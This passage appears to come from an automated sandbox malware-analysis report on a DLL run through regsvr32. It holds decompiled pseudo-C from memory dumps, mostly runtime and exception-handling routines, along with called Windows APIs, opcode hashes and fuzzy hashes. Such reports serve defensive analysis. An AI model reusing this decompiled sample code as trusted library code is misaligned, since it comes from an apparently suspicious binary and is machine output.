                                                                                                                                                                  								__eflags =  *((intOrPtr*)(0x67cd4200 + _t58 * 4)) - _t110;
                                                                                                                                                                  								if( *((intOrPtr*)(0x67cd4200 + _t58 * 4)) == _t110) {
                                                                                                                                                                  									break;
                                                                                                                                                                  								}
                                                                                                                                                                  								_t58 = _t58 - 1;
                                                                                                                                                                  								__eflags = _t58;
                                                                                                                                                                  								if(_t58 >= 0) {
                                                                                                                                                                  									continue;
                                                                                                                                                                  								}
                                                                                                                                                                  								break;
                                                                                                                                                                  							}
                                                                                                                                                                  							__eflags = _t58;
                                                                                                                                                                  							if(__eflags >= 0) {
                                                                                                                                                                  								if(__eflags == 0) {
                                                                                                                                                                  									goto L34;
                                                                                                                                                                  								}
                                                                                                                                                                  								goto L32;
                                                                                                                                                                  							}
                                                                                                                                                                  							goto L28;
                                                                                                                                                                  						}
                                                                                                                                                                  						_t75 =  *((intOrPtr*)(_t108 - 8));
                                                                                                                                                                  						__eflags = _t75 - _v8;
                                                                                                                                                                  						if(_t75 < _v8) {
                                                                                                                                                                  							goto L20;
                                                                                                                                                                  						}
                                                                                                                                                                  						__eflags = _t75 - _t108;
                                                                                                                                                                  						if(_t75 >= _t108) {
                                                                                                                                                                  							goto L20;
                                                                                                                                                                  						}
                                                                                                                                                                  						goto L15;
                                                                                                                                                                  					}
                                                                                                                                                                  					L5:
                                                                                                                                                                  					_t63 = 1;
                                                                                                                                                                  					goto L60;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					goto L3;
                                                                                                                                                                  				}
                                                                                                                                                                  			}




































                                                                                                                                                                  0x67cd24d5
                                                                                                                                                                  0x67cd24d7
                                                                                                                                                                  0x67cd24da
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd24dc
                                                                                                                                                                  0x67cd24de
                                                                                                                                                                  0x67cd2544
                                                                                                                                                                  0x67cd2544
                                                                                                                                                                  0x67cd26a2
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd26a2
                                                                                                                                                                  0x67cd24e0
                                                                                                                                                                  0x67cd24e0
                                                                                                                                                                  0x67cd24e4
                                                                                                                                                                  0x67cd24e6
                                                                                                                                                                  0x67cd24e6
                                                                                                                                                                  0x67cd24e6
                                                                                                                                                                  0x67cd24e6
                                                                                                                                                                  0x67cd24e9
                                                                                                                                                                  0x67cd24ea
                                                                                                                                                                  0x67cd24ed
                                                                                                                                                                  0x67cd24ed
                                                                                                                                                                  0x67cd24f1
                                                                                                                                                                  0x67cd24f5
                                                                                                                                                                  0x67cd2503
                                                                                                                                                                  0x67cd2503
                                                                                                                                                                  0x67cd250b
                                                                                                                                                                  0x67cd2511
                                                                                                                                                                  0x67cd2513
                                                                                                                                                                  0x67cd2515
                                                                                                                                                                  0x67cd2525
                                                                                                                                                                  0x67cd2532
                                                                                                                                                                  0x67cd2536
                                                                                                                                                                  0x67cd253b
                                                                                                                                                                  0x67cd253d
                                                                                                                                                                  0x67cd25bb
                                                                                                                                                                  0x67cd25bb
                                                                                                                                                                  0x67cd253f
                                                                                                                                                                  0x67cd253f
                                                                                                                                                                  0x67cd253f
                                                                                                                                                                  0x67cd25bd
                                                                                                                                                                  0x67cd25bf
                                                                                                                                                                  0x67cd26a0
                                                                                                                                                                  0x67cd26a0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd25c5
                                                                                                                                                                  0x67cd25c5
                                                                                                                                                                  0x67cd25cc
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd25d2
                                                                                                                                                                  0x67cd25d6
                                                                                                                                                                  0x67cd2632
                                                                                                                                                                  0x67cd2634
                                                                                                                                                                  0x67cd263c
                                                                                                                                                                  0x67cd263e
                                                                                                                                                                  0x67cd2640
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd2642
                                                                                                                                                                  0x67cd2648
                                                                                                                                                                  0x67cd264a
                                                                                                                                                                  0x67cd264c
                                                                                                                                                                  0x67cd2661
                                                                                                                                                                  0x67cd2661
                                                                                                                                                                  0x67cd2663
                                                                                                                                                                  0x67cd2692
                                                                                                                                                                  0x67cd2699
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd2699
                                                                                                                                                                  0x67cd2667
                                                                                                                                                                  0x67cd2668
                                                                                                                                                                  0x67cd266a
                                                                                                                                                                  0x67cd266c
                                                                                                                                                                  0x67cd266c
                                                                                                                                                                  0x67cd266e
                                                                                                                                                                  0x67cd2670
                                                                                                                                                                  0x67cd2672
                                                                                                                                                                  0x67cd2686
                                                                                                                                                                  0x67cd2686
                                                                                                                                                                  0x67cd2689
                                                                                                                                                                  0x67cd268b
                                                                                                                                                                  0x67cd268b
                                                                                                                                                                  0x67cd268c
                                                                                                                                                                  0x67cd268c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd2674
                                                                                                                                                                  0x67cd2674
                                                                                                                                                                  0x67cd2674
                                                                                                                                                                  0x67cd267d
                                                                                                                                                                  0x67cd267e
                                                                                                                                                                  0x67cd2680
                                                                                                                                                                  0x67cd2682
                                                                                                                                                                  0x67cd2682
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd2674
                                                                                                                                                                  0x67cd2672
                                                                                                                                                                  0x67cd264e
                                                                                                                                                                  0x67cd2655
                                                                                                                                                                  0x67cd2655
                                                                                                                                                                  0x67cd2657
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd2659
                                                                                                                                                                  0x67cd265a
                                                                                                                                                                  0x67cd265d
                                                                                                                                                                  0x67cd265f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd265f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd2655
                                                                                                                                                                  0x67cd25d8
                                                                                                                                                                  0x67cd25db
                                                                                                                                                                  0x67cd25e0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd25e9
                                                                                                                                                                  0x67cd25eb
                                                                                                                                                                  0x67cd25f1
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd25f7
                                                                                                                                                                  0x67cd25fd
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd2603
                                                                                                                                                                  0x67cd2605
                                                                                                                                                                  0x67cd260e
                                                                                                                                                                  0x67cd2612
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd2618
                                                                                                                                                                  0x67cd261b
                                                                                                                                                                  0x67cd261d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd2624
                                                                                                                                                                  0x67cd2626
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd2628
                                                                                                                                                                  0x67cd262c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd262c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd2517
                                                                                                                                                                  0x67cd2517
                                                                                                                                                                  0x67cd2517
                                                                                                                                                                  0x67cd251e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd2520
                                                                                                                                                                  0x67cd2521
                                                                                                                                                                  0x67cd2523

                                                                                                                                                                  APIs
                                                                                                                                                                  • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 67CD2536
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586887246.0000000067CD1000.00000020.00020000.sdmp, Offset: 67CD0000, based on PE: true
                                                                                                                                                                  • Associated: 00000003.00000002.586875007.0000000067CD0000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000003.00000002.586900121.0000000067CD3000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000003.00000002.586914004.0000000067CD5000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000003.00000002.586928100.0000000067CD6000.00000002.00020000.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cd0000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MemoryQueryVirtual
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2850889275-0
                                                                                                                                                                  • Opcode ID: 7f5f6b0ed3133dd10b6f9346fc91efe52e8fe3acbce19963c450383c614cdd65
                                                                                                                                                                  • Instruction ID: 5c5d0a0829ccef5d51a5a9a0f2cda676981e68c8eb79685ebd190d80f18e558b
                                                                                                                                                                  • Opcode Fuzzy Hash: 7f5f6b0ed3133dd10b6f9346fc91efe52e8fe3acbce19963c450383c614cdd65
                                                                                                                                                                  • Instruction Fuzzy Hash: D561C031684A029FEB19CF69D8F0B6973B5EB9E314F248069DB65C7290F731D983CA50
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(67D3ECFF,00000001,?,67D3DC71,67D3DD0F,00000003,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 67D3ED41
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586991103.0000000067CDE000.00000020.00020000.sdmp, Offset: 67CDE000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cde000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: EnumLocalesSystem
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2099609381-0
                                                                                                                                                                  • Opcode ID: 5815c728e1ad7cff02ced7a92dd8d18d30f6f268cd27a2ceced4c876ad6da38c
                                                                                                                                                                  • Instruction ID: 1d2f81366ea0b471ce98950a6823121e5e85f2f254804e137c0fcaef64510bc4
                                                                                                                                                                  • Opcode Fuzzy Hash: 5815c728e1ad7cff02ced7a92dd8d18d30f6f268cd27a2ceced4c876ad6da38c
                                                                                                                                                                  • Instruction Fuzzy Hash: 6FE04672040218EBEF00CFA4D846B9D3BB5FB4A730F048801F61C6A090C2B9A9A09F4C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,00000002,?,?,67D33D76,?,?,?,00000002,?,00000000,00000000), ref: 67D3EDC0
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586991103.0000000067CDE000.00000020.00020000.sdmp, Offset: 67CDE000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cde000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                                                  • Opcode ID: 718f4d58fcb974bda93e95fcbbeeb326d306bad0e50160065a3e634ac76aebd5
                                                                                                                                                                  • Instruction ID: e5d55977afabbfda19944eff54ada47fd236e14b7fb1178e47ffd11d9e193ebd
                                                                                                                                                                  • Opcode Fuzzy Hash: 718f4d58fcb974bda93e95fcbbeeb326d306bad0e50160065a3e634ac76aebd5
                                                                                                                                                                  • Instruction Fuzzy Hash: 57D01776004119FFEF019FE0E8068AA3B69FB8A634B040C00F91C45550DA36A8609B65
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(?), ref: 67D35EA7
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586991103.0000000067CDE000.00000020.00020000.sdmp, Offset: 67CDE000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cde000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                                                  • Opcode ID: bb9a1b7cd1bcee8d1ce3067de9e7b3d41d45dced042025dd3fafb9567b853a09
                                                                                                                                                                  • Instruction ID: a7a4e9a123f2e0eb5f4f0669bcb54a7bf67c01314686a157877decc49840fdd7
                                                                                                                                                                  • Opcode Fuzzy Hash: bb9a1b7cd1bcee8d1ce3067de9e7b3d41d45dced042025dd3fafb9567b853a09
                                                                                                                                                                  • Instruction Fuzzy Hash: 1FA0123000010CE7CE001A45D8054487F1CEA429A07004010F40C00011873254104994
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetProcessHeap.KERNEL32(67D2C958,67DA3798,00000008,67DA4008,67DA354C,?,00000001), ref: 67D35139
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586991103.0000000067CDE000.00000020.00020000.sdmp, Offset: 67CDE000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cde000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HeapProcess
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 54951025-0
                                                                                                                                                                  • Opcode ID: 4098b80a7e351d0edfb9383180c8d85a7570595c08bdc88697b466ea481b020a
                                                                                                                                                                  • Instruction ID: f543eabd14578f204719f6a56f4dccdaf819e99adfb538f1b2f7ae61aa7bfe6e
                                                                                                                                                                  • Opcode Fuzzy Hash: 4098b80a7e351d0edfb9383180c8d85a7570595c08bdc88697b466ea481b020a
                                                                                                                                                                  • Instruction Fuzzy Hash: 5EB012F030710287BF080F38945A10D35D8774D221311053D7007C9140DF24C4909A0C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586991103.0000000067CDE000.00000020.00020000.sdmp, Offset: 67CDE000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cde000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 13ae554fede668713c8418b731cea2a7546aabb52c717da24dcf4f4522932379
                                                                                                                                                                  • Instruction ID: b8d93a9013950c55917d18f98444529b66ace8fba6ffbcd75cd916dc7abda030
                                                                                                                                                                  • Opcode Fuzzy Hash: 13ae554fede668713c8418b731cea2a7546aabb52c717da24dcf4f4522932379
                                                                                                                                                                  • Instruction Fuzzy Hash: 05614FB1E00625CBDB18CF1DC890169FBF6BF99300729C5AAD959EB319E670D941CB90
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 71%
                                                                                                                                                                  			E67CD2264(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                  				char _v12;
                                                                                                                                                                  				void* __ebp;
                                                                                                                                                                  				signed int* _t43;
                                                                                                                                                                  				char _t44;
                                                                                                                                                                  				void* _t46;
                                                                                                                                                                  				void* _t49;
                                                                                                                                                                  				intOrPtr* _t53;
                                                                                                                                                                  				void* _t54;
                                                                                                                                                                  				void* _t65;
                                                                                                                                                                  				long _t66;
                                                                                                                                                                  				signed int* _t80;
                                                                                                                                                                  				signed int* _t82;
                                                                                                                                                                  				void* _t84;
                                                                                                                                                                  				signed int _t86;
                                                                                                                                                                  				void* _t89;
                                                                                                                                                                  				void* _t95;
                                                                                                                                                                  				void* _t96;
                                                                                                                                                                  				void* _t99;
                                                                                                                                                                  				void* _t106;
                                                                                                                                                                  
                                                                                                                                                                  				_t43 = _t84;
                                                                                                                                                                  				_t65 = __ebx + 2;
                                                                                                                                                                  				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                                                                                                                                                  				_t89 = _t95;
                                                                                                                                                                  				_t96 = _t95 - 8;
                                                                                                                                                                  				_push(_t65);
                                                                                                                                                                  				_push(_t84);
                                                                                                                                                                  				_push(_t89);
                                                                                                                                                                  				asm("cld");
                                                                                                                                                                  				_t66 = _a8;
                                                                                                                                                                  				_t44 = _a4;
                                                                                                                                                                  				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                                                                                                                                                  					_push(_t89);
                                                                                                                                                                  					E67CD23CB(_t66 + 0x10, _t66, 0xffffffff);
                                                                                                                                                                  					_t46 = 1;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_v12 = _t44;
                                                                                                                                                                  					_v8 = _a12;
                                                                                                                                                                  					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                                                                                                                                                  					_t86 =  *(_t66 + 0xc);
                                                                                                                                                                  					_t80 =  *(_t66 + 8);
                                                                                                                                                                  					_t49 = E67CD2485(_t66);
                                                                                                                                                                  					_t99 = _t96 + 4;
                                                                                                                                                                  					if(_t49 == 0) {
                                                                                                                                                                  						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                                                                                                                                                  						goto L11;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						while(_t86 != 0xffffffff) {
                                                                                                                                                                  							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                                                                                                                                                  							if(_t53 == 0) {
                                                                                                                                                                  								L8:
                                                                                                                                                                  								_t80 =  *(_t66 + 8);
                                                                                                                                                                  								_t86 = _t80[_t86 + _t86 * 2];
                                                                                                                                                                  								continue;
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_t54 =  *_t53();
                                                                                                                                                                  								_t89 = _t89;
                                                                                                                                                                  								_t86 = _t86;
                                                                                                                                                                  								_t66 = _a8;
                                                                                                                                                                  								_t55 = _t54;
                                                                                                                                                                  								_t106 = _t54;
                                                                                                                                                                  								if(_t106 == 0) {
                                                                                                                                                                  									goto L8;
                                                                                                                                                                  								} else {
                                                                                                                                                                  									if(_t106 < 0) {
                                                                                                                                                                  										_t46 = 0;
                                                                                                                                                                  									} else {
                                                                                                                                                                  										_t82 =  *(_t66 + 8);
                                                                                                                                                                  										E67CD2370(_t55, _t66);
                                                                                                                                                                  										_t89 = _t66 + 0x10;
                                                                                                                                                                  										E67CD23CB(_t89, _t66, 0);
                                                                                                                                                                  										_t99 = _t99 + 0xc;
                                                                                                                                                                  										E67CD2467(_t82[2]);
                                                                                                                                                                  										 *(_t66 + 0xc) =  *_t82;
                                                                                                                                                                  										_t66 = 0;
                                                                                                                                                                  										_t86 = 0;
                                                                                                                                                                  										 *(_t82[2])(1);
                                                                                                                                                                  										goto L8;
                                                                                                                                                                  									}
                                                                                                                                                                  								}
                                                                                                                                                                  							}
                                                                                                                                                                  							goto L13;
                                                                                                                                                                  						}
                                                                                                                                                                  						L11:
                                                                                                                                                                  						_t46 = 1;
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				L13:
                                                                                                                                                                  				return _t46;
                                                                                                                                                                  			}
























                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586887246.0000000067CD1000.00000020.00020000.sdmp, Offset: 67CD0000, based on PE: true
                                                                                                                                                                  • Associated: 00000003.00000002.586875007.0000000067CD0000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000003.00000002.586900121.0000000067CD3000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000003.00000002.586914004.0000000067CD5000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000003.00000002.586928100.0000000067CD6000.00000002.00020000.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cd0000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                                                                                                                                  • Instruction ID: 47f1ac006f41b4446628820c2526d164d1575431cc097f2e2ee87d8c4fd3b9bc
                                                                                                                                                                  • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                                                                                                                                  • Instruction Fuzzy Hash: 3421C8729002049FCB01DF68C8D09ABB7A9FF4D350B468169DE599B245F770F915C7E1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.587551185.0000000067DA6000.00000040.00020000.sdmp, Offset: 67DA6000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67da6000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
                                                                                                                                                                  • Instruction ID: 294a225bc51c7c4e5f997f40f4a34c8ad51d04cc4047ed82cb86c5b61e49b489
                                                                                                                                                                  • Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
                                                                                                                                                                  • Instruction Fuzzy Hash: E3118E73340200DFDB14CF59DC80EA6B3AAFB9D274B298466ED08CB311E676E851C7A0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.587551185.0000000067DA6000.00000040.00020000.sdmp, Offset: 67DA6000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67da6000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
                                                                                                                                                                  • Instruction ID: 306309f7354712415fa16f02080f1f36ce8403445356dc06dd8f8890204a7947
                                                                                                                                                                  • Opcode Fuzzy Hash: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
                                                                                                                                                                  • Instruction Fuzzy Hash: 5C01DE32304201DFE705CB2DE884D69FBE8FBCA330B15947EC446C7619E224E846CA60
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • RtlDecodePointer.NTDLL(?), ref: 67D335A7
                                                                                                                                                                  • _free.LIBCMT ref: 67D335C0
                                                                                                                                                                    • Part of subcall function 67D33DA6: HeapFree.KERNEL32(00000000,00000000,?,67D3206D,00000000,00000001,00000000,?,?,?,67D2D916,67D2B7A5), ref: 67D33DBA
                                                                                                                                                                    • Part of subcall function 67D33DA6: GetLastError.KERNEL32(00000000,?,67D3206D,00000000,00000001,00000000,?,?,?,67D2D916,67D2B7A5), ref: 67D33DCC
                                                                                                                                                                  • _free.LIBCMT ref: 67D335D3
                                                                                                                                                                  • _free.LIBCMT ref: 67D335F1
                                                                                                                                                                  • _free.LIBCMT ref: 67D33603
                                                                                                                                                                  • _free.LIBCMT ref: 67D33614
                                                                                                                                                                  • _free.LIBCMT ref: 67D3361F
                                                                                                                                                                  • _free.LIBCMT ref: 67D33643
                                                                                                                                                                  • RtlEncodePointer.NTDLL(67DA5980), ref: 67D3364A
                                                                                                                                                                  • _free.LIBCMT ref: 67D3365F
                                                                                                                                                                  • _free.LIBCMT ref: 67D33675
                                                                                                                                                                  • _free.LIBCMT ref: 67D3369D
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586991103.0000000067CDE000.00000020.00020000.sdmp, Offset: 67CDE000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cde000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3064303923-0
                                                                                                                                                                  • Opcode ID: 5d38af8439c472d8258e91cf97d8167a79c52c2f006914598776bc1621617c53
                                                                                                                                                                  • Instruction ID: 5b297e6ba1fcfb1794a3c413de295173fae07ce9103061f8abc5687d910bfc16
                                                                                                                                                                  • Opcode Fuzzy Hash: 5d38af8439c472d8258e91cf97d8167a79c52c2f006914598776bc1621617c53
                                                                                                                                                                  • Instruction Fuzzy Hash: FB215E71907671DFEE904F34EA42D19B7A4BB4FB343150D2AE5169B340CB3998818B99
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586991103.0000000067CDE000.00000020.00020000.sdmp, Offset: 67CDE000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cde000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1442030790-0
                                                                                                                                                                  • Opcode ID: 0e6f461ce93a4bd834e44a146061b5e8890ff594ff41cbeb0a238302037d8781
                                                                                                                                                                  • Instruction ID: 07e778a43e8ca61f9107bbab534575561e4322fc0d7f259ab9e4bfcee4ba7f8c
                                                                                                                                                                  • Opcode Fuzzy Hash: 0e6f461ce93a4bd834e44a146061b5e8890ff594ff41cbeb0a238302037d8781
                                                                                                                                                                  • Instruction Fuzzy Hash: 13219236948631EBE7619F65DE01E4BFBE4DF4B77CF108C29E59456160EB32A40086F2
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586991103.0000000067CDE000.00000020.00020000.sdmp, Offset: 67CDE000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cde000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson_wcscmp
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3432600739-0
                                                                                                                                                                  • Opcode ID: 2b43a7497c7f599a526524c2e1fbe53f2c6295f5bf7bb7344e1b22cc207cc77d
                                                                                                                                                                  • Instruction ID: 121cc64845e1b09ad92c64c17281f6e4470b71339cb0f766aac9ee9362633410
                                                                                                                                                                  • Opcode Fuzzy Hash: 2b43a7497c7f599a526524c2e1fbe53f2c6295f5bf7bb7344e1b22cc207cc77d
                                                                                                                                                                  • Instruction Fuzzy Hash: FB41A432804325EFDB00DFA8D881B8DF7B5BF4E33CF108D29EA1556140DB76A5459BA6
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • __init_pointers.LIBCMT ref: 67D3212F
                                                                                                                                                                    • Part of subcall function 67D337EA: RtlEncodePointer.NTDLL(00000000), ref: 67D337ED
                                                                                                                                                                    • Part of subcall function 67D337EA: __initp_misc_winsig.LIBCMT ref: 67D33808
                                                                                                                                                                    • Part of subcall function 67D337EA: GetModuleHandleW.KERNEL32(67CD30D8,?,67DA3798,00000008,67DA4008,67DA354C,?,00000001), ref: 67D35B99
                                                                                                                                                                  • __mtinitlocks.LIBCMT ref: 67D32134
                                                                                                                                                                  • __mtterm.LIBCMT ref: 67D3213D
                                                                                                                                                                    • Part of subcall function 67D321A5: RtlDeleteCriticalSection.NTDLL(?), ref: 67D38218
                                                                                                                                                                    • Part of subcall function 67D321A5: _free.LIBCMT ref: 67D3821F
                                                                                                                                                                    • Part of subcall function 67D321A5: RtlDeleteCriticalSection.NTDLL(67DA4D40), ref: 67D38241
                                                                                                                                                                  • __calloc_crt.LIBCMT ref: 67D32162
                                                                                                                                                                  • __initptd.LIBCMT ref: 67D32184
                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 67D3218B
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586991103.0000000067CDE000.00000020.00020000.sdmp, Offset: 67CDE000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cde000_regsvr32.jbxd
                                                                                                                                                                  Similarity
